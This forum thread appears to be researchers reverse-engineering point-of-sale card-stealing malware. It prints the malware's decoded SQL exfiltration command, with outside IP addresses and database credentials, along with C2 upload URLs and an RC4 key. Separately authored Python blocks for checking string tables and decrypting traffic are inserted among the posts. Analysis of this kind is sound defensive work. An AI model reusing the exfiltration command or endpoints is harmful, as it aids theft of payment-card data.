Point-of-Sale malwares / RAM scrapers

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Fri Feb 01, 2013 12:44 pm

It was written on January 27th.. Why did no one tell me this?
I feel so darn stupid to realize that only ME doesn't know anything about the previous details..
I spent a lot of my time researching for nothing..
bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Fri Feb 01, 2013 12:55 pm

You're funny :)

Any idea about encryption after reading that post?
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Fri Feb 01, 2013 8:01 pm

exitthematrix wrote:Any idea about encryption after reading that post?
This key in below registry may help:
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Retalix\Security, or
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Retalix\Security

Code:

Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
But I need "data" or "traffic" to test decoding of this key.

Since we cannot get the traffic in all tries,
the only way left is to reverse this sample the way he did to get the so-called "weird strings".

See below, quoted from the post:
And the most epic stuff, I found a weird string used by another crappy function after nopping to see what happened if the malware found something in RAM:
[image]
maybe it "sounds" like that.. I would be happy to see those "weird strings" values or just paste the Rx values,
(wasn't that difficult and not a risky task to share anyway...and he didn't :-()
which decodes in:
[image]
Oh, F(word) me! "What" is to be decoded with "what" to burp these results??
If I may suggest, please contact the writer and ask him for either the traffic data or the memory registers or that "weird strings" data,
because I won't spend more of my time on this with such scattered details/info..
So many serious high-risk infectors out there which need to be nailed too..rather than this empty cleaned-up server..
aaSSfxxx
Posts: 12
Joined: Tue Oct 23, 2012 8:28 pm

Fri Feb 01, 2013 9:42 pm

@unixfreakjp: first, I think the "Security" key you found won't help to decode data because it's just Windows service manager crap (the malware creates its service of not installer, and then launches the service with the command round above).

Then, for the ugly string I found, it doesn't seem to be an encoded string, but just a list of characters which are taken to build the connection command (where the SQL server credentials were stored).

Btw if you don't want to load the malware with OllyDbg, you can use IDA to have a global view of the malware and locate interesting runPE (I'll send the ugly string tomorrow, I'm on my smartphone here).
aaSSfxxx
Posts: 12
Joined: Tue Oct 23, 2012 8:28 pm

Sat Feb 02, 2013 12:02 pm

Btw, I saw the comment of unixfreakjp on my blog, so I'll answer the two questions asked (I have to create another post since I can't edit my previous post):

1. What was the "weird string" you talk about?

The string I found was

Code:

BLC.bdR3S% 1!rA2l"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF
It is used by the decrypt function at 004019F0 (in TcpAdaptorService1.exe).

2. With "what" you decoded that "weird string" to that sql inject command?

I decoded the function by stepping into the function I showed (at 004019F0), that's all. This function simply does bit permutation, it's not really a crypto function.
And sorry for the details, I was a bit lazy when I wrote the article :oops: (and there is nothing to explain, just follow the code with OllyDbg).

Btw the sample "mmon.exe" helped me to understand what happened too (it's a debug version of the malware which doesn't include all service managing crap).
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Sat Feb 02, 2013 5:04 pm

Hi. Thanks for the kind explanation. I debugged and found the same result
[image]
Viewing the string, I find that you're right: the registry key wasn't for this. (tried to brute the registry keys with many encryption methods & didn't come to a reasonable result either)
The permutation mentioned is bit operations, which are giving me a headache following this in my CUI. I'll install IDA for following this more.

PS: I'm so sorry that you had to re-write the blog post. That was not my intention.
EP_X0FF
Global Moderator
Posts: 4905
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Sun Feb 03, 2013 3:40 am

unixfreaxjp wrote: [image]
Viewing the string, I find that you're right: the registry key wasn't for this. (tried to brute the registry keys with many encryption methods & didn't come to a reasonable result either)
The permutation mentioned is bit operations, which are giving me a headache following this in my CUI. I'll install IDA for following this more.
Simple and primitive swapping. There are a few "encrypted" strings inside.

First

Code:

"',27h,'4 d3rI-s8UTP9pecvaCwt,1;.BhfLSli2F(%)DQuNREO6MWmb0=k7oA!
decoded to

Code:

svchosts -S  FS1 -U sa -P -Q "INSERT INTO OЃENэOWSET('SQLOLEDB','Network=DBMSSOCN;Address=46.166.178.209,443;uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'"
How to? Load the TcpAdaptorService (SHA-1 89089c3427ecfbdb4694ad07e821650ede514001) malware in Olly, go to 004020A0 and start execution from it. Just F7 until 0040265E, where the LEA takes place. Here you have the fully constructed string, with probably a malware decoding BUG :D Notice
OЃENэOWSET
which should be
OPENROWSET
Also notice
FS1
which should be
MFS1
but the first symbol for me is trashed (actual value 0x5).

Didn't dig too much, as it's boring.

Second

Code:

BLC.bdR3S% 1!rA2l"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF
decoded to

Code:

svchosts.exe -S MFS1 -U sa -P -Q "INSERT INTO OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=46.108.132.18,443;uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'
Decoder at 004019F0.
Ring0 - the source of inspiration
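As an added example (my code, not anything posted by aaSSfxxx or EP_X0FF), the check below tests the "character table" reading of the weird strings: if a decoded command is built by indexing into the table, every character of the command must appear in it, and the garbled bytes in OPENROWSET / MFS1 should be the only ones that fall outside. It assumes the `',27h,'` in the pasted listings is MASM/IDA notation for a literal single-quote byte.

```python
# Added example (not code from any poster in this thread): does each "weird
# string" act as a character table for its decoded command?
# Assumption: ',27h,' in the pasted listings is MASM/IDA syntax for a literal
# single-quote byte (0x27) that splits the string literal.

def masm_literal_to_str(listing: str) -> str:
    """Resolve the pasted listing into the real string.

    A fragment like  abc',27h,'def  stands for  abc'def  (the literal is
    closed, a raw 27h byte is emitted, the literal is reopened).  Only this
    one hex-byte form is handled, since it is the only one in the thread.
    """
    return listing.replace("',27h,'", "'")

# Tables as pasted in the thread (first string -> first command, etc.)
TABLE_1 = masm_literal_to_str(
    "\"',27h,'4 d3rI-s8UTP9pecvaCwt,1;.BhfLSli2F(%)DQuNREO6MWmb0=k7oA!")
TABLE_2 = masm_literal_to_str(
    "BLC.bdR3S% 1!rA2l\"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF")

# Decoded commands as pasted in the thread (including the garbled bytes)
DECODED_1 = ('svchosts -S  FS1 -U sa -P -Q "INSERT INTO OЃENэOWSET(\'SQLOLEDB\','
             '\'Network=DBMSSOCN;Address=46.166.178.209,443;uid=sa;pwd=sambo123!\','
             ' \'SELECT tab from rec..tbl\') SELECT \'%s\'"')
DECODED_2 = ('svchosts.exe -S MFS1 -U sa -P -Q "INSERT INTO OPENROWSET(\'SQLOLEDB\','
             '\'Network=DBMSSOCN;Address=46.108.132.18,443;uid=sa;pwd=sambo123!\','
             ' \'SELECT tab from rec..tbl\') SELECT \'%s\'')

def outside_table(decoded: str, table: str) -> set:
    """Characters of `decoded` that the table cannot produce.

    Empty set  -> consistent with an index-into-table scheme.
    Non-empty  -> not a table scheme, or a decoding fault in the sample
                  (the corrupted OPENROWSET bytes of the first command).
    """
    return set(decoded) - set(table)

def table_has_duplicates(table: str) -> bool:
    """A usable table maps each index to one distinct character."""
    return len(set(table)) != len(table)

if __name__ == "__main__":
    for name, dec, tab in (("first", DECODED_1, TABLE_1),
                           ("second", DECODED_2, TABLE_2)):
        print(name, "table:", len(tab), "chars; duplicates:",
              table_has_duplicates(tab), "; outside table:",
              sorted(outside_table(dec, tab)))
```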
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Sun Feb 03, 2013 11:01 am

Win32/Spy.POSCardStealer.B: https://www.virustotal.com/file/b3e15a2 ... 359887855/ > 31/45
a variant of Win32/Spy.POSCardStealer.D: https://www.virustotal.com/file/bc7dd5d ... 359888491/ > 29/46

btw the unknown scraper (http://www.kernelmode.info/forum/viewto ... 756#p17063) is now known as Win32/Spy.POSCardStealer.B
and found a POS malware named 'Alina'; I will post more samples later.
bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Sun Feb 03, 2013 11:31 am

Xylitol wrote:Win32/Spy.POSCardStealer.B: https://www.virustotal.com/file/b3e15a2 ... 359887855/ > 31/45
a variant of Win32/Spy.POSCardStealer.D: https://www.virustotal.com/file/bc7dd5d ... 359888491/ > 29/46

btw the unknown scraper (http://www.kernelmode.info/forum/viewto ... 756#p17063) is now known as Win32/Spy.POSCardStealer.B
b3e15a281bb3e1f5ef63841c1801118f6262ac8fb1c8daa45fd99c051011de4b

Sends RC4-encrypted base64 data to: http://192.168.1.9/FUCKERS/post.php
Is this a work in progress? Test/beta? (192.168.1.9)
Data is RC4 encrypted with the "B0tswanaRul3z" key.
Seems to be a variant of that mm_bot.exe previously posted by you, but more advanced, with more options (or just DEBUG?).

bc7dd5d2fcb072941a2aa9752d0ec8e0933d0ee5406b0d117d9c455083e835d6

Sends POST data to: http://84.22.106.94/panel2asdasd/up.php (data as: act=%s&b=%s&c=%s&v=%s&%s=) every 20 seconds!

The guy seems Romanian, his girlfriend is "Alina" :) ("Alina v2.1", "alina=", "X:\code\grab\src\Release\Alina.pdb")

It is not the same malware.
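As an added example (my code, not bsteo's or anything from the sample), the decoder below recovers the plaintext of a captured post.php body for the .B sample under the reading that the body is base64(RC4(key, data)) with the "B0tswanaRul3z" key quoted above; the order of the two layers and the sample payload are assumptions, the payload being constructed here rather than captured.

```python
# Added example (not from any poster): decode the .B sample's exfiltration
# body, assuming body = base64(RC4(KEY, plaintext)).  The plaintext used
# below is constructed for the demo, not captured traffic.
import base64

KEY = b"B0tswanaRul3z"   # key quoted in the thread

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same op."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation + XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def decode_post_body(body: str, key: bytes = KEY) -> bytes:
    """base64 -> RC4 -> plaintext.  Raises binascii.Error on bad base64,
    so a body that is not base64 at all is reported rather than garbled."""
    return rc4(key, base64.b64decode(body, validate=True))

def encode_post_body(plaintext: bytes, key: bytes = KEY) -> str:
    """Inverse direction, used here only to build a test vector."""
    return base64.b64encode(rc4(key, plaintext)).decode("ascii")

# Constructed stand-in for a bot upload (not real card data, not a real host)
SAMPLE_PLAINTEXT = b"host=POS-TEST-01&data=CONSTRUCTED_SAMPLE_PAYLOAD"
SAMPLE_BODY = encode_post_body(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("wire body :", SAMPLE_BODY)
    print("decoded   :", decode_post_body(SAMPLE_BODY))
```

Feeding it a body taken from a pcap of the sample's POST traffic would confirm or refute the assumed layer order: a wrong order or key yields high-entropy bytes instead of readable fields.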
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Sun Feb 03, 2013 11:59 am
